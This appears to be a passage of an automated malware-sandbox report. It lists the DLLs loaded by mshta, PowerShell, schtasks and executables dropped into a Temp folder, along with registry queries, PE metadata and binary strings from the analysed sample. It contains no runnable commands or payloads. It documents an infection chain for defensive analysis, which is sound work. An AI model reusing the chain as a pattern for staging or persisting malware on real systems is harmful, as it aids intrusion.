                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESection loaded: wininet.dll
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                      Source: Window RecorderWindow detected: More than 3 window changes detected
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                      Source: M6gQuZPvgY.exeStatic file information: File size 2166784 > 1048576
                                      Source: M6gQuZPvgY.exeStatic PE information: Raw size of zwbixhzy is bigger than: 0x100000 < 0x1a1200
                                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599541837.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600168948.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\win32api.pdb source: trano1221.exe, 0000002A.00000002.1973015383.00007FF98B681000.00000040.00000001.01000000.0000003B.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\win32api.pdb!! source: trano1221.exe, 0000002A.00000002.1973015383.00007FF98B681000.00000040.00000001.01000000.0000003B.sdmp
                                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1589374900.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ucrtbase.pdb source: trano1221.exe, 0000002A.00000002.2026351473.00007FF98EA95000.00000002.00000001.01000000.0000001B.sdmp
                                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591172756.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: trano1221.exe, 0000002A.00000002.1975102681.00007FF98B9F1000.00000040.00000001.01000000.00000034.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588949427.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: trano1221.exe, 0000002A.00000002.1980923674.00007FF98C161000.00000040.00000001.01000000.0000002C.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1597912717.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599207028.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600305599.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: trano1221.exe, 00000023.00000003.1583189955.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2033979566.00007FF9AF531000.00000002.00000001.01000000.0000001D.sdmp
                                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589825821.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: trano1221.exe, 00000023.00000003.1583404038.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2031587031.00007FF9A75E5000.00000002.00000001.01000000.00000039.sdmp
                                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598486784.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1595664997.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599069389.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589063022.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: trano1221.exe, 0000002A.00000002.1975102681.00007FF98B9F1000.00000040.00000001.01000000.00000034.sdmp
                                      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.9 30 May 20233.0.9built on: Tue Jul 11 19:52:20 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: trano1221.exe, 0000002A.00000002.1980923674.00007FF98C161000.00000040.00000001.01000000.0000002C.sdmp
                                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591679400.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588680873.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589182480.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598930353.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: trano1221.exe, 0000002A.00000002.1996605213.00007FF98C9D1000.00000040.00000001.01000000.00000029.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: trano1221.exe, 0000002A.00000002.2029904114.00007FF9A06FC000.00000040.00000001.01000000.00000028.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: trano1221.exe, 0000002A.00000002.2030594224.00007FF9A3331000.00000040.00000001.01000000.00000027.sdmp
